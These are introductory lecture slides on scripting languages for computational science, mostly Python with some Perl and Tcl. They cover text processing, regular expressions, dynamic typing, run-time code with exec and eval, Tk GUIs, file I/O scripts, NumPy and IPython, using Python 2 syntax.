

![]() | Very high-level, often short, program written in a high-level scripting language |
![]() | Scripting languages: Unix shells, Tcl, Perl, Python, Ruby, Scheme, Rexx, JavaScript, VisualBasic, ... |
![]() | This course: Python + a taste of Perl and Bash (Unix shell) |

![]() | Glue other programs together |
![]() | Extensive text processing |
![]() | File and directory manipulation |
![]() | Often special-purpose code |
![]() | Many small interacting scripts may yield a big system |
![]() | Perhaps a special-purpose GUI on top |
![]() | Portable across Unix, Windows, Mac |
![]() | Interpreted program (no compilation+linking) |

![]() | shorter, more high-level programs |
![]() | much faster software development |
![]() | more convenient programming |
![]() | you feel more productive |
![]() | no variable declarations, but lots of consistency checks at run time |
![]() | lots of standardized libraries and tools |

![]() | Consider reading real numbers from a file, where each line
can contain an arbitrary number of real numbers:
1.1 9 5.2 1.762543E-02 0 0.01 0.001 9 3 7 |
![]() | Python solution:
F = open(filename, 'r')
n = F.read().split() |

![]() | Perl solution:
open F, $filename; $s = join "", <F>; @n = split ' ', $s; |
![]() | Doing this in C++ or Java requires at least a loop, and in Fortran and C quite some code lines are necessary |
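A minimal sketch of the Python solution above, extended with the conversion from text to floats. The helper name `read_numbers` and the file name `numbers.dat` are made up for this illustration, and the code is written to run under Python 3.

```python
import os
import tempfile

def read_numbers(filename):
    """Return all whitespace-separated numbers in a file as floats."""
    with open(filename, 'r') as f:
        # split() without arguments splits on any whitespace, newlines included
        return [float(word) for word in f.read().split()]

# write a small test file with a varying number of values per line
path = os.path.join(tempfile.mkdtemp(), 'numbers.dat')
with open(path, 'w') as f:
    f.write('1.1 9 5.2\n1.762543E-02\n0 0.01 0.001\n')

numbers = read_numbers(path)
print(numbers)
```

Note that `F.read().split()` alone yields a list of strings; the `float` conversion is the extra step needed before computing with the values.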

![]() | Suppose we want to read complex numbers written as text
(-3, 1.4) or (-1.437625E-9, 7.11) or ( 4, 2 ) |
![]() | Python solution:
m = re.search(r'\(\s*([^,]+)\s*,\s*([^,]+)\s*\)',
'(-3,1.4)')
re, im = [float(x) for x in m.groups()]
|
![]() | Perl solution:
$s="(-3, 1.4)"; ($re,$im)= $s=~ /\(\s*([^,]+)\s*,\s*([^,]+)\s*\)/; |

![]() | Regular expressions like
\(\s*([^,]+)\s*,\s*([^,]+)\s*\) constitute a powerful language for specifying text patterns |
![]() | Doing the same thing, without regular expressions, in Fortran and C requires quite some low-level code at the character array level |
![]() | Remark: we could read pairs (-3, 1.4) without using regular expressions,
s = '(-3, 1.4 )'
re, im = [float(x) for x in s[1:-1].split(',')]
|
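The regular-expression solution can be wrapped in a small function, sketched here for Python 3. The function name `parse_complex` is hypothetical, and the variables are called `real` and `imag` rather than `re` and `im` so that the `re` module is not overwritten.

```python
import re

# same pattern as in the slide, compiled once
pair_pattern = re.compile(r'\(\s*([^,]+)\s*,\s*([^,]+)\s*\)')

def parse_complex(text):
    """Turn text like '(-3, 1.4)' into a Python complex number."""
    m = pair_pattern.search(text)
    if m is None:
        raise ValueError('no (re, im) pair found in %r' % text)
    # float() tolerates surrounding blanks, so no extra strip is needed
    real, imag = [float(x) for x in m.groups()]
    return complex(real, imag)

for s in '(-3, 1.4)', '(-1.437625E-9, 7.11)', '( 4, 2 )':
    print(s, '->', parse_complex(s))
```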

![]() | Example of a Python function:
import os
def debug(leading_text, variable):
    if os.environ.get('MYDEBUG', '0') == '1':
        print leading_text, variable
|
![]() | Dumps any printable variable (number, list, hash, heterogeneous structure) |
![]() | Printing can be turned on/off by setting the environment variable MYDEBUG |

![]() | Templates can be used to mimic dynamically typed languages |
![]() | Not as quick and convenient programming:
template <class T>
void debug(std::ostream& o,
           const std::string& leading_text,
           const T& variable)
{
  char* c = getenv("MYDEBUG");
  bool defined = false;
  if (c != NULL) {  // if MYDEBUG is defined ...
    if (std::string(c) == "1") {  // if MYDEBUG is true ...
      defined = true;
    }
  }
  if (defined) {
    o << leading_text << " " << variable << std::endl;
  }
}
|

![]() | Object-oriented programming can also be used to parameterize types |
![]() | Introduce base class A and a range of subclasses, all with a (virtual) print function |
![]() | Let debug work with var as an A reference |
![]() | Now debug works for all subclasses of A |
![]() | Advantage: complete control of the legal variable types that debug is allowed to print (may be important in big systems to ensure that a function can only make transactions with certain objects) |
![]() | Disadvantage: much more work, much more code, less reuse of debug in new occasions |

![]() | User-friendly environments (Matlab, Maple, Mathematica, S-Plus, ...) allow flexible function interfaces |
![]() | Novice user:
# f is some data
plot(f) |
![]() | More control of the plot:
plot(f, label='f', xrange=[0,10]) |
![]() | More fine-tuning:
plot(f, label='f', xrange=[0,10], title='f demo',
linetype='dashed', linecolor='red')
|

![]() | Keyword arguments = function arguments with
keywords and default values, e.g.,
def plot(data, label='', xrange=None, title='',
linetype='solid', linecolor='black', ...)
|
![]() | The sequence and number of arguments in the call can be chosen by the user |

![]() | Inside the function one can test on the type of argument provided by the user |
![]() | xrange can be left out (value None), or given as a 2-element list (xmin/xmax), or given as a string 'xmin:xmax', or given as a single number (meaning 0:number) etc.
if xrange is not None:  # i.e. xrange is specified by the user
    if isinstance(xrange, list):  # list [xmin,xmax] ?
        xmin = xrange[0]; xmax = xrange[1]
    elif isinstance(xrange, str):  # string 'xmin:xmax' ?
        xmin, xmax = re.search(r'(.*):(.*)',xrange).groups()
    elif isinstance(xrange, float):  # just a float?
        xmin = 0; xmax = xrange
|
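The two ideas above (keyword arguments with defaults, and testing on the argument type) can be combined in a runnable sketch. The helper `get_range` and the stand-in `plot`, which only reports how it interpreted its arguments, are hypothetical; the code is written for Python 3.

```python
import re

def get_range(xrange=None):
    """Return (xmin, xmax) from a list, a 'xmin:xmax' string or a number."""
    if xrange is None:                      # not specified by the user
        return None
    if isinstance(xrange, (list, tuple)):   # [xmin, xmax]
        xmin, xmax = xrange
    elif isinstance(xrange, str):           # 'xmin:xmax'
        xmin, xmax = re.search(r'(.*):(.*)', xrange).groups()
    elif isinstance(xrange, (int, float)):  # single number: 0:number
        xmin, xmax = 0, xrange
    else:
        raise TypeError('cannot interpret xrange=%r' % (xrange,))
    return float(xmin), float(xmax)

def plot(data, label='', xrange=None, title=''):
    """Stand-in for a plot function: just report the interpreted arguments."""
    return {'n': len(data), 'label': label,
            'xrange': get_range(xrange), 'title': title}

f = [0.0, 0.5, 1.0]
print(plot(f))                                  # novice call
print(plot(f, title='f demo', xrange='0:10'))   # keywords in any order
print(plot(f, xrange=[0, 10], label='f'))
print(plot(f, xrange=10))
```

Converting to `float` at the end means that the string form `'0:10'` gives numbers rather than the substrings `'0'` and `'10'`.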

![]() | Many criteria can be used to classify computer languages |
![]() | Dynamically vs statically typed languages
Python (dynamic):
c = 1          # c is an integer
c = [1,2,3]    # c is a list
C (static):
double c; c = 5.2;    /* c can only hold doubles */
c = "a string...";    /* compiler error */ |

![]() | Weakly vs strongly typed languages
Perl (weak):
$b = '1.2';
$c = 5*$b;    # implicit type conversion: '1.2' -> 1.2
Python (strong):
b = '1.2'
c = 5.0*b     # illegal (TypeError); no implicit type conversion '1.2' -> 1.2 |
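A short Python 3 sketch of what strong typing means in practice: the text `'1.2'` must be converted explicitly before arithmetic. One caveat worth knowing is that an integer times a string is legal in Python, but it means repetition, not numerical multiplication.

```python
b = '1.2'

# explicit conversion is required to do arithmetic with the text
c = 5*float(b)
print(c)

# mixing a float and a string is rejected at run time
try:
    c = 5.0*b
except TypeError as e:
    print('TypeError:', e)

# int*str is legal, but repeats the string instead of converting it
print(3*'ab')
```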

![]() | Interpreted vs compiled languages |
![]() | Dynamically vs statically typed (or type-safe) languages |
![]() | High-level vs low-level languages (Python-C) |
![]() | Very high-level vs high-level languages (Python-C) |
![]() | Scripting vs system languages |

![]() | Code can be constructed and executed at run-time |
![]() | Consider an input file with the syntax
a = 1.2
no of iterations = 100
solution strategy = 'implicit'
c1 = 0
c2 = 0.1
A = 4
c3 = StringFunction('A*sin(x)')
|
![]() | How can we read this file and define variables a, no_of_iterations, solution_strategy, c1, c2, A with the specified values? |
![]() | And can we make c3 a function c3(x) as specified? |

![]() | The answer lies in this short and generic code:
import re
file = open('inputfile.dat', 'r')
for line in file:
    variable, value = [s.strip() for s in line.split('=')]
    # replace blanks on the left-hand side of = by _
    variable = re.sub(' ', '_', variable)
    exec(variable + '=' + value)  # magic...
|
![]() | This cannot be done in Fortran, C, C++ or Java! |
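A self-contained variant of the idea, sketched for Python 3. Two things differ from the slide and are assumptions of this sketch: the input is held in a string instead of a file, and the new variables are collected in an explicit dictionary (`namespace`) rather than created in the running script. The `c3 = StringFunction(...)` line is left out since it needs the course's own module. Since `exec` runs arbitrary code, this technique is only suitable for input files you trust.

```python
import re

input_text = """\
a = 1.2
no of iterations = 100
solution strategy = 'implicit'
c1 = 0
c2 = 0.1
A = 4
"""

namespace = {}                       # collects the new variables
for line in input_text.splitlines():
    if '=' not in line:
        continue                     # skip blank or malformed lines
    variable, value = [s.strip() for s in line.split('=', 1)]
    variable = re.sub(' ', '_', variable)
    # run e.g. "no_of_iterations=100" with namespace as the variable store
    exec(variable + '=' + value, namespace)

print(namespace['no_of_iterations'], namespace['solution_strategy'])
```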

![]() | Here is a similar input file but with some additional
difficulties (strings without quotes and verbose function expressions as values):
set heat conduction = 5.0
set dt = 0.1
set rootfinder = bisection
set source = V*exp(-q*t) is function of (t) with V=0.1, q=1
set bc = sin(x)*sin(y)*exp(-0.1*t) is function of (x,y,t) |
![]() | Can we read such files and define variables and functions? (here heat_conduction, dt and rootfinder, with the specified values, and source and bc as functions) |

# target line:
# set some name of variable = some value
import re
from py4cs import misc
def parse_file(somefile):
    namespace = {}  # holds all new created variables
    line_re = re.compile(r'set (.*?)=(.*)$')
    for line in somefile:
        m = line_re.search(line)
        if m:
            variable = m.group(1).strip()
            value = m.group(2).strip()
            # test if value is a StringFunction specification:
            if value.find('is function of') >= 0:
                # interpret function specification:
                value = eval(string_function_parser(value))
            else:
                value = misc.str2obj(value)  # string -> object
            # space in variables names is illegal
            variable = variable.replace(' ', '_')
            code = 'namespace["%s"] = value' % variable
            exec code
    return namespace

# target line (with parameters A and q):
# expression is function of (x,y) with A=1, q=2
# or (no parameters)
# expression is function of (t)
def string_function_parser(text):
    m = re.search(r'(.*) is function of \((.*)\)( with .+)?', text)
    if m:
        expr = m.group(1).strip(); args = m.group(2).strip()
        # the 3rd group is optional:
        prms = m.group(3)
        if prms is None:  # no parameters given
            prms = ''  # works fine below
        else:
            prms = ''.join(prms.split()[1:])  # strip off 'with'
        # quote arguments:
        args = ', '.join(["'%s'" % v for v in args.split(',')])
        if args.find(',') < 0:  # single argument?
            args = args + ','  # add comma in tuple
        args = '(' + args + ')'  # tuple needs parenthesis
        s = "StringFunction('%s', independent_variables=%s, %s)" % \
            (expr, args, prms)
        return s
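To see what happens when the string built by the parser is passed to `eval`, here is a sketch for Python 3 with a hypothetical, heavily simplified stand-in for the `StringFunction` class (the real class lives in the course's py4cs package and is not reproduced here). The string `s` is written out by hand in the form the parser is designed to produce for the `source` line of the input file.

```python
import math

class StringFunction:
    """Hypothetical stand-in for the StringFunction class used above."""
    def __init__(self, expression, independent_variables=('x',), **parameters):
        self.expression = expression
        self.variables = tuple(independent_variables)
        # names visible to the expression: math functions + parameters
        self.names = dict(vars(math))
        self.names.update(parameters)

    def __call__(self, *args):
        # bind the independent variables to the call arguments
        local_names = dict(zip(self.variables, args))
        return eval(self.expression, self.names, local_names)

# the kind of string built for
#   V*exp(-q*t) is function of (t) with V=0.1, q=1
s = "StringFunction('V*exp(-q*t)', independent_variables=('t',), V=0.1,q=1)"
source = eval(s)       # turn the string into a callable object
print(source(0.0))     # V*exp(0)
print(source(1.0))     # V*exp(-1)
```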

![]() | Python has interfaces to many GUI libraries (Gtk, Qt, MFC, java.awt, java.swing, wxWindows, Tk) |
![]() | The simplest library to use: Tk |
![]() | Python + Tk = rapid GUI development |
![]() | Wrap your scripts with a GUI in half a day |
![]() | Easy for others to use your tools |
![]() | Indispensable for demos |
![]() | Quite complicated GUIs can also be made with Tk (and extensions) |

![]() | Make a window on the screen with the text 'Hello World' |
![]() | C + X11: 176 lines of ugly code |
![]() | Python + Tk: 6 lines of readable code
#!/usr/bin/env python
from Tkinter import *
root = Tk()
Label(root, text='Hello, World!',
foreground="white", background="black").pack()
root.mainloop()
|
![]() | Java and C++ codes are longer than Python + Tk |

![]() | Many applications need a GUI accessible through a Web page |
![]() | Perl and Python have extensive support for writing (server-side) dynamic Web pages (CGI scripts) |
![]() | Perl and Python are central tools in the e-commerce explosion |
![]() | Leading tools such as Plone and Zope (for dynamic web sites) are Python based |

![]() | C++ version implemented first |
![]() | Tcl version had more functionality |
![]() | C++ version: 2 months |
![]() | Tcl version: 1 day |
![]() | Effort ratio: 60 |

![]() | C++ version implemented first |
![]() | C++ version: 2-3 months |
![]() | Tcl version: 1 week |
![]() | Effort ratio: 8-12 |

![]() | Tcl version implemented first |
![]() | C version: 3 months |
![]() | Tcl version: 2 weeks |
![]() | Effort ratio: 6 |

![]() | Tcl version implemented first |
![]() | Tcl version had somewhat more functionality |
![]() | Java version: 3400 lines, 3-4 weeks |
![]() | Tcl version: 1600 lines, 1 week |
![]() | Effort ratio: 3-4 |

![]() | Perl and Python scripts are first compiled to byte-code |
![]() | The byte-code is then interpreted |
![]() | Text processing is usually as fast as in C |
![]() | Loops over large data structures might be very slow
for i in range(len(A)):
    A[i] = ...
|
![]() | Fortran, C and C++ compilers are good at optimizing such loops at compile time and produce very efficient assembly code (e.g. 100 times faster) |
![]() | Fortunately, long loops in scripts can easily be migrated to Fortran or C |

![]() | Pure Python: 4s |
![]() | Pure Perl: 3s |
![]() | Pure Tcl: 11s |
![]() | Pure C (fscanf/fprintf): 1s |
![]() | Pure C++ (iostream): 3.6s |
![]() | Pure C++ (buffered streams): 2.5s |
![]() | Numerical Python modules: 2.2s (!) |
![]() | Remark: in practice, 100 000 data points are written and read in binary format, resulting in much smaller differences |

Language | CPU-time | lines of code
--- | --- | ---
C | 0.30 | 150
Java | 9.2 | 105
C++ (STL-deque) | 11.2 | 70
C++ (STL-list) | 1.5 | 70
Awk | 2.1 | 20
Perl | 1.0 | 18

Machine: Pentium II running Windows NT

![]() | The application's main task is to connect together existing components |
![]() | The application includes a graphical user interface |
![]() | The application performs extensive string/text manipulation |
![]() | The design of the application code is expected to change significantly |
![]() | CPU-time intensive parts can be migrated to C/C++ or Fortran |

![]() | The application can be made short if it operates heavily on list or hash structures |
![]() | The application is supposed to communicate with Web servers |
![]() | The application should run without modifications on Unix, Windows, and Macintosh computers, also when a GUI is included |

![]() | Does the application implement complicated algorithms and data structures? |
![]() | Does the application manipulate large datasets so that execution speed is critical? |
![]() | Are the application's functions well-defined and changing slowly? |
![]() | Will type-safe languages be an advantage, e.g., in large development teams? |

![]() | Get the power of Unix also in non-Unix environments |
![]() | Automate manual interaction with the computer |
![]() | Customize your own working environment and become more efficient |
![]() | Increase the reliability of your work (what you did is documented in the script) |
![]() | Have more fun! |

![]() | Perl and Python are very popular in the open source movement and Linux environments |
![]() | Perl and Python are widely used for creating Web services and administering computer systems |
![]() | Perl and Python (and Tcl) replace 'home-made' (application-specific) scripting interfaces |
![]() | Many companies want candidates with Perl/Python experience |

![]() | Scripting languages are free |
![]() | What about companies that do mission-critical operations? |
![]() | Can we use Perl or Python when sending a man to Mars? |
![]() | Who is responsible for the quality of products like Perl and Python? |

![]() | Scripting languages are developed as a world-wide collaboration of volunteers (open source model) |
![]() | The open source community as a whole is responsible for the quality |
![]() | There is a single source for Perl and for Python |
![]() | This source is read, tested and controlled by a very large number of people (and experts) |
![]() | The reliability of large open source projects like Linux, Perl, and Python appears to be very good - at least as good as commercial software |

![]() | Scripting in general, but with most examples taken from scientific computing |
![]() | Aimed at novice scripters |
![]() | Flavor of lectures: 'getting started' |
![]() | Jump into useful scripts and dissect the code |
![]() | Learn more by programming |
![]() | Find examples, look up man pages, Web docs and textbooks on demand |
![]() | Get the overview |
![]() | Customize existing code |
![]() | Have fun and work with useful things |

![]() | Problem: you are not an expert (yet) |
![]() | Where to find detailed info, and how to understand it? |
![]() | The efficient programmer navigates quickly in the jungle of textbooks, man pages, README files, source code examples, Web sites, news groups, ... and has a gut feeling for what to look for |
![]() | The aim of the course is to improve your practical problem-solving abilities |
![]() | You think you know when you learn, are more sure when you can write, even more when you can teach, but certain when you can program (Alan Perlis) |

![]() | Dissection of complete introductory scripts |
![]() | Lists of common tasks (recipes!) |
![]() | Regular expressions and text processing |
![]() | CGI programming (dynamic Web pages) |
![]() | GUI programming with Python |
![]() | Creating effective working environments |
![]() | Combining Python with C/C++ or Fortran |
![]() | Software engineering (documentation, modules, version control) |



![]() | You will need Python in recent versions (at least v2.2) |
![]() | Several add-on modules are needed later on in the slides |
![]() | Here is a list of software needed for the Python part:
http://folk.uio.no/hpl/scripting/softwarelist.html |

![]() | These slides have a companion book: Scripting in Computational Science, 2nd edition, Texts in Computational Science and Engineering, Springer, 2006 |
![]() | Currently, we are working on the 3rd edition |
![]() | All examples can be downloaded as a tarfile
http://folk.uio.no/hpl/scripting/scripting-src.tar.gz |

![]() |
Unpack scripting-src.tar.gz in a directory and let scripting be an environment variable pointing to the top directory:
tar xvzf scripting-src.tar.gz
export scripting=`pwd`
All paths in these slides are given relative to scripting, e.g., src/py/intro/hw.py is reached as $scripting/src/py/intro/hw.py |

![]() | All computer language intros start with a program that prints "Hello, World!" to the screen |
![]() | Scientific computing extension: add reading a number and computing its sine value |
![]() | The script (hw.py) should be run like this:
python hw.py 3.4
or just (Unix)
./hw.py 3.4 |
![]() | Output:
Hello, World! sin(3.4)=-0.255541102027 |

![]() | how to read a command-line argument |
![]() | how to call a math (sine) function |
![]() | how to work with variables |
![]() | how to print text and numbers |

![]() | File hw.py:
#!/usr/bin/env python
# load system and math module:
import sys, math
# extract the 1st command-line argument:
r = float(sys.argv[1])
s = math.sin(r)
print "Hello, World! sin(" + str(r) + ")=" + str(s)
|
![]() | Make the file executable (on Unix):
chmod a+rx hw.py |

![]() | The first line specifies the interpreter of the script (here the first python program in your path)
python hw.py 1.4   # first line is treated as a comment
./hw.py 1.4        # first line is used to specify an interpreter |
![]() | Even simple scripts must load modules:
import sys, math |
![]() | Numbers and strings are two different types:
r = sys.argv[1]          # r is a string
s = math.sin(float(r))   # sin expects a number, not the string r
# s becomes a floating-point number |

![]() | Desired output:
Hello, World! sin(3.4)=-0.255541102027 |
![]() | String concatenation:
print "Hello, World! sin(" + str(r) + ")=" + str(s)
|
![]() | C printf-like statement:
print "Hello, World! sin(%g)=%g" % (r,s) |
![]() | Variable interpolation:
print "Hello, World! sin(%(r)g)=%(s)g" % vars() |

%d : integer
%5d : integer in a field of width 5 chars
%-5d : integer in a field of width 5 chars,
but adjusted to the left
%05d : integer in a field of width 5 chars,
padded with zeroes from the left
%g : float variable in %f or %e notation
%e : float variable in scientific notation
%11.3e : float variable in scientific notation,
with 3 decimals, field of width 11 chars
%5.1f : float variable in fixed decimal notation,
with one decimal, field of width 5 chars
%.3f : float variable in fixed decimal form,
with three decimals, field of min. width
%s : string
%-20s : string in a field of width 20 chars,
and adjusted to the left
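The format specifications in the table can be tried out directly. The sketch below uses Python 3 (`print` as a function) and wraps each result in brackets so that the field width is visible; the sample values are arbitrary.

```python
r = 3.4
n = 42
name = 'hw.py'

print('[%d]' % n)          # [42]
print('[%5d]' % n)         # [   42]
print('[%-5d]' % n)        # [42   ]
print('[%05d]' % n)        # [00042]
print('[%g]' % r)          # [3.4]
print('[%e]' % r)          # [3.400000e+00]
print('[%11.3e]' % r)      # [  3.400e+00]
print('[%5.1f]' % r)       # [  3.4]
print('[%.3f]' % r)        # [3.400]
print('[%-20s]' % name)    # hw.py followed by 15 blanks inside the brackets
```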

![]() | Single- and double-quoted strings work in the same way
s1 = "some string with a number %g" % r
s2 = 'some string with a number %g' % r  # = s1 |
![]() | Triple-quoted strings can span multiple lines with embedded newlines:
text = """
large portions of a text
can be conveniently placed
inside triple-quoted strings
(newlines are preserved)""" |
![]() | Raw strings, where backslash is backslash:
s3 = r'\(\s+\.\d+\)'
# with ordinary string (must quote backslash):
s3 = '\\(\\s+\\.\\d+\\)' |
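A quick Python 3 check of the string facts above: the raw and the ordinary spelling give the same string, and a triple-quoted string keeps its newlines. The sample text passed to `re.search` is made up for the illustration.

```python
import re

s3_raw = r'\(\s+\.\d+\)'
s3_ordinary = '\\(\\s+\\.\\d+\\)'
print(s3_raw == s3_ordinary)          # the two spellings are identical

text = """line one
line two"""
print(text.count('\n'))               # one embedded newline

# the pattern matches "(", blanks, a dot, digits and ")"
match = re.search(s3_raw, 'value: ( .25)')
print(match.group())
```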

![]() | Make a bookmark for $scripting/doc.html |
![]() | Follow link to Index to Python Library Reference (complete on-line Python reference) |
![]() | Click on Python keywords, modules etc. |
![]() | Online alternative: pydoc, e.g., pydoc math |
![]() | pydoc lists all classes and functions in a module |
![]() | Alternative: Python in a Nutshell (or Beazley's textbook) |
![]() | Recommendation: use these slides and associated book together with the Python Library Reference, and learn by doing exercises! |

![]() | Read (x,y) data from a two-column file |
![]() | Transform y values to f(y) |
![]() | Write (x,f(y)) to a new file |
![]() | How to open, read, write and close files |
![]() | How to write and call a function |
![]() | How to work with arrays (lists) |

![]() | Usage:
./datatrans1.py infilename outfilename |
![]() | Read the two command-line arguments: input and output filenames
infilename = sys.argv[1]
outfilename = sys.argv[2] |
![]() | Command-line arguments are in sys.argv[1:] |
![]() | sys.argv[0] is the name of the script |

![]() | What if the user fails to provide two command-line arguments? |
![]() | Python aborts execution with an informative error message |
![]() | Manual handling of errors:
try:
    infilename = sys.argv[1]
    outfilename = sys.argv[2]
except:
    # try block failed,
    # we miss two command-line arguments
    print 'Usage:', sys.argv[0], 'infile outfile'
    sys.exit(1)
This is the common way of dealing with errors in Python,
called exception handling
|
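The same error handling, sketched as a Python 3 function that can be tried without a real command line. The function name `get_filenames` is hypothetical. Unlike the slide, the sketch catches only `IndexError` (the exception raised when a list index is missing), which avoids hiding unrelated errors.

```python
import sys

def get_filenames(argv):
    """Return (infilename, outfilename); stop with a usage text if missing."""
    try:
        infilename = argv[1]
        outfilename = argv[2]
    except IndexError:
        # fewer than two command-line arguments were given
        print('Usage:', argv[0], 'infile outfile')
        sys.exit(1)
    return infilename, outfilename

print(get_filenames(['datatrans1.py', 'in.dat', 'out.dat']))

try:
    get_filenames(['datatrans1.py'])      # too few arguments
except SystemExit as e:
    print('script would stop with exit status', e.code)
```

`sys.exit` works by raising the exception `SystemExit`, which is why the last call can be intercepted here for demonstration purposes.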

![]() | Open files:
ifile = open( infilename, 'r')  # r for reading
ofile = open(outfilename, 'w')  # w for writing
afile = open(appfilename, 'a')  # a for appending |
![]() | Read line by line:
for line in ifile:
    # process line
|
![]() | Observe: blocks are indented; no braces! |

import math
def myfunc(y):
    if y >= 0.0:
        return y**5*math.exp(-y)
    else:
        return 0.0

# alternative way of calling module functions
# (gives more math-like syntax in this example):
from math import *
def myfunc(y):
    if y >= 0.0:
        return y**5*exp(-y)
    else:
        return 0.0

![]() | Input file format: two columns with numbers
0.1 1.4397
0.2 4.325
0.5 9.0 |
![]() | Read (x,y), transform y, write (x,f(y)):
for line in ifile:
    pair = line.split()
    x = float(pair[0]); y = float(pair[1])
    fy = myfunc(y)  # transform y value
    ofile.write('%g %12.5e\n' % (x,fy))
|
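The pieces shown so far (open files, loop over lines, transform, write) can be put together in one runnable Python 3 sketch. The function name `transform` and the temporary file names are assumptions of the sketch; the real script reads the file names from the command line.

```python
import math
import os
import tempfile

def myfunc(y):
    if y >= 0.0:
        return y**5*math.exp(-y)
    else:
        return 0.0

def transform(infilename, outfilename):
    """Read (x,y) pairs from one file, write (x,f(y)) pairs to another."""
    ifile = open(infilename, 'r')
    ofile = open(outfilename, 'w')
    for line in ifile:
        pair = line.split()
        x = float(pair[0]); y = float(pair[1])
        ofile.write('%g %12.5e\n' % (x, myfunc(y)))
    ifile.close(); ofile.close()

# make a small input file in a scratch directory and transform it
tmpdir = tempfile.mkdtemp()
infile = os.path.join(tmpdir, 'in.dat')
outfile = os.path.join(tmpdir, 'out.dat')
with open(infile, 'w') as f:
    f.write('0.1 1.4397\n0.2 4.325\n0.5 9.0\n')

transform(infile, outfile)
with open(outfile, 'r') as f:
    result = f.read()
print(result)
```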

![]() | This construction is more flexible and traditional in Python (and a bit strange...):
while 1:
    line = ifile.readline()  # read a line
    if not line: break
    # process line
i.e., an 'infinite' loop with the termination criterion
inside the loop
|

![]() | Read input file into list of lines:
lines = ifile.readlines() |
![]() | Now the 1st line is lines[0], the 2nd is lines[1], etc. |
![]() | Store x and y data in lists:
# go through each line,
# split line into x and y columns
x = []; y = []  # store data pairs in lists x and y
for line in lines:
    xval, yval = line.split()
    x.append(float(xval))
    y.append(float(yval))
|

![]() | For-loop in Python:
for i in range(start,stop,inc):
    ...
for j in range(stop):
    ...
generates
i = start, start+inc, start+2*inc, ... (all values less than stop)
j = 0, 1, 2, ..., stop-1 |
![]() | Loop over (x,y) values:
ofile = open(outfilename, 'w')  # open for writing
for i in range(len(x)):
    fy = myfunc(y[i])  # transform y value
    ofile.write('%g %12.5e\n' % (x[i], fy))
ofile.close()
|
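A small Python 3 check of which values `range` generates. In Python 3, `range` is lazy, so `list()` is used to display the values. The stop value itself is never included, and with an increment larger than 1 the last value may be smaller than stop-1.

```python
print(list(range(2, 10, 3)))   # start=2, stop=10, inc=3
print(list(range(4)))          # start defaults to 0, inc to 1

# typical use: loop over the indices of a list
x = [0.1, 0.2, 0.5]
indices = [i for i in range(len(x))]
print(indices)
```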

![]() | Method 1: write just the name of the scriptfile:
./datatrans1.py infile outfile
# or
datatrans1.py infile outfile
if . (current working directory) or the directory containing datatrans1.py is in the path |
![]() | Method 2: run an interpreter explicitly:
python datatrans1.py infile outfile
This uses the first python program found in the path |
![]() | This works on Windows too (method 1 requires the right assoc/ftype bindings for .py files) |

![]() | In method 1, the interpreter to be used is specified in the first line |
![]() | Explicit path to the interpreter:
#!/usr/local/bin/python
or perhaps your own Python interpreter:
#!/home/hpl/projects/scripting/Linux/bin/python |
![]() | Using env to find the first Python interpreter in the path:
#!/usr/bin/env python |

![]() | Yes and no, depending on how you see it |
![]() | Python first compiles the script into bytecode |
![]() | The bytecode is then interpreted |
![]() | No linking with libraries; libraries are imported dynamically when needed |
![]() | It appears as if there is no compilation |
![]() | Quick development: just edit the script and run! (no time-consuming compilation and linking) |
![]() | Extensive error checking at run time |

![]() | Easy to introduce intricate bugs? |
![]() | No, extensive consistency checks at run time replace the need for static typing and compile-time checks |
![]() | Example: sending a string to the sine function, math.sin('t'), triggers a run-time error (type incompatibility) |
![]() | Example: try to open a non-existing file
./datatrans1.py qqq someoutfile
Traceback (most recent call last):
  File "./datatrans1.py", line 12, in ?
    ifile = open( infilename, 'r')
IOError: [Errno 2] No such file or directory: 'qqq'
|
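Both run-time errors mentioned above can be provoked and caught in a few lines. This is a Python 3 sketch; the list `errors` and the scratch-directory path are only there to make the example self-contained. In Python 3, `IOError` is an alias of `OSError`.

```python
import math
import os
import tempfile

errors = []

# a string sent to the sine function: type incompatibility
try:
    math.sin('t')
except TypeError as e:
    errors.append(('TypeError', str(e)))

# a file that does not exist (qqq inside a fresh, empty directory)
missing = os.path.join(tempfile.mkdtemp(), 'qqq')
try:
    open(missing, 'r')
except IOError as e:
    errors.append(('IOError', e.errno))

for kind, info in errors:
    print(kind, info)
```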

![]() | x and y in datatrans2.py are lists |
![]() | We can compute with lists element by element (as shown) |
![]() | However: using Numerical Python (NumPy) arrays instead of lists is much more efficient and convenient |
![]() | Numerical Python is an extension of Python: a new fixed-size array type and lots of functions operating on such arrays |

![]() | Import (more on this later...):
from py4cs.numpytools import *
x = sequence(0, 1, 0.001)  # 0.0, 0.001, 0.002, ..., 1.0
x = sin(x)                 # computes sin(x[0]), sin(x[1]) etc. |
![]() | x=sin(x) is 13 times faster than an explicit loop:
for i in range(len(x)):
    x[i] = sin(x[i])
because sin(x) invokes an efficient loop in C
|

![]() | A special module loads tabular file data into NumPy arrays:
import py4cs.filetable
f = open(infilename, 'r')
x, y = py4cs.filetable.read_columns(f)
f.close() |
![]() | Now we can compute with the NumPy arrays x and y:
from py4cs.numpytools import *  # import everything in NumPy
x = 10*x
y = 2*y + 0.1*sin(x) |
![]() | We can easily write x and y back to a file:
f = open(outfilename, 'w')
py4cs.filetable.write_columns(f, x, y)
f.close() |

![]() | Multi-dimensional arrays can be constructed:
x = zeros(n, Float)        # array with indices 0,1,...,n-1
x = zeros((m,n), Float)    # two-dimensional array
x[i,j] = 1.0               # indexing
x = zeros((p,q,r), Float)  # three-dimensional array
x[i,j,k] = -2.1
x = sin(x)*cos(x) |
![]() | We can plot one-dimensional arrays:
from py4cs.anyplot.gnuplot_ import *
x = sequence(0, 2, 0.1)
y = x + sin(10*x)
plot(x, y) |
![]() | NumPy has lots of math functions and operations |
![]() | SciPy is a comprehensive extension of NumPy |
![]() | NumPy + SciPy is a kind of Matlab replacement for many people |

![]() | Python statements can be run interactively in a Python shell |
![]() | The "best" shell is called IPython |
![]() | Sample session with IPython:
Unix/DOS> ipython
...
In [1]:3*4-1
Out[1]:11
In [2]:from math import *
In [3]:x = 1.2
In [4]:y = sin(x)
In [5]:x
Out[5]:1.2
In [6]:y
Out[6]:0.93203908596722629 |

![]() | Up- and down-arrows: go through command history |
![]() | Emacs key bindings for editing previous commands |
![]() | The underscore variable holds the last output
In [6]:y
Out[6]:0.93203908596722629
In [7]:_ + 1
Out[7]:1.93203908596722629 |

![]() | IPython supports TAB completion: write a part of a command or
name (variable, function, module), hit the TAB key, and IPython will
complete the word or show different alternatives:
In [1]: import math
In [2]: math.<TABKEY>
math.__class__ math.__str__ math.frexp
math.__delattr__ math.acos math.hypot
math.__dict__ math.asin math.ldexp
...
or
In [2]: my_variable_with_a_very_long_name = True
